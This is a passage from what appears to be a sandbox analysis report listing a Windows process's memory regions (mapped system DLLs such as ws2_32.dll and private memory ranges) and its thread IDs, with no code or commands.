entry_point = 0x7feff62a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1832
start_va = 0x7feff680000
end_va = 0x7feff856fff
monitored = 0
entry_point = 0x7feff681010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1833
start_va = 0x7feffac0000
end_va = 0x7feffb0cfff
monitored = 0
entry_point = 0x7feffac1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1834
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1835
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 1836
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 1837
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 1838
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 1839
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 1840
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 1841
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 1842
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1843
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1844
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1845
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 1846
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1847
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1848
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1849
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1850
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1851
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1852
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 1853
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 1854
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 1855
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1856
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 1857
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Thread:
id = 103
os_tid = 0xf84
Thread:
id = 104
os_tid = 0xc80
Thread:
id = 105
os_tid = 0xc5c
Thread:
id = 106
os_tid = 0x46c
Thread:
id = 107
os_tid = 0x3dc
Thread:
id = 108
os_tid = 0x4f4
Thread:
id = 109
os_tid = 0x31c
Thread:
id = 110
os_tid = 0x7bc
Thread:
id = 111
os_tid = 0x5fc
Thread:
id = 112
os_tid = 0x5f4
Thread:
id = 113
os_tid = 0x5ec
Thread:
id = 114
os_tid = 0x558
Thread:
id = 115
os_tid = 0x554
Thread:
id = 116
os_tid = 0x460
Thread:
id = 117
os_tid = 0x448
Thread:
id = 118
os_tid = 0x3b0
Thread:
id = 119
os_tid = 0x3a8
Thread:
id = 120
os_tid = 0x398
Thread:
id = 121
os_tid = 0x2f8
Thread:
id = 122
os_tid = 0x2f4
Thread:
id = 123
os_tid = 0x2d0
Thread:
id = 124
os_tid = 0x2c4
Thread:
id = 126
os_tid = 0xfa0
Thread:
id = 128
os_tid = 0xfdc